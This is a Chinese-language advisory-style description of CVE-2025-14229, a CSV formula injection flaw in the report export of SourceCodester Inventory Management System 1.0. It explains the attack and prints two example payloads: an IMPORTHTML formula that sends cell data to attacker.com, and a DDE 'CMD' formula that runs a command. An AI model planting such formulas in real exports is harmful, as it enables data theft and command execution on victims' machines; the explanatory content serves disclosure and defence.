CVE-2025-14229CVE-2025-14229是存在于SourceCodester Inventory Management System 1.0版本中的中危安全漏洞。该漏洞位于SVC Report Export(报表导出)组件的未知函数中,攻击者可以通过构造特殊的输入数据触发CSV注入(也称为公式注入)漏洞。CVSS评分4.7属于中等严重程度,攻击复杂度低,无需用户交互,但需要较高权限。由于该漏洞的利用代码已公开披露,攻击者可能利用此漏洞进行进一步攻击,如远程代码执行。CSV注入是一种常见的Web应用安全漏洞,当应用程序将用户输入直接嵌入到CSV文件中时,攻击者可以注入公式或命令,当用户打开导出的CSV文件时,这些公式会在电子表格软件中执行,可能导致敏感数据泄露或系统被完全控制。
该漏洞存在于SourceCodester Inventory Management System的报表导出功能中。攻击者通过在输入字段中注入CSV特殊字符(如=、+、-、@)开头的公式内容,当系统导出数据为CSV格式时,这些内容会被Excel或类似软件解析为公式而非纯文本。攻击者通常注入类似'=IMPORTHTML("http://attacker.com/steal?data="&A1)','list',0)'或'=CMD|'/C calc'!A0'的公式,诱导用户打开文件时自动执行外带数据或系统命令。在电子表格软件中,以等号(=)开头的字符串会被识别为公式,攻击者可利用这些公式实现数据外带、钓鱼攻击,甚至在某些配置下实现远程代码执行(RCE)。由于该漏洞需要高权限用户进行操作,攻击者可能需要先获取一定权限才能利用此漏洞。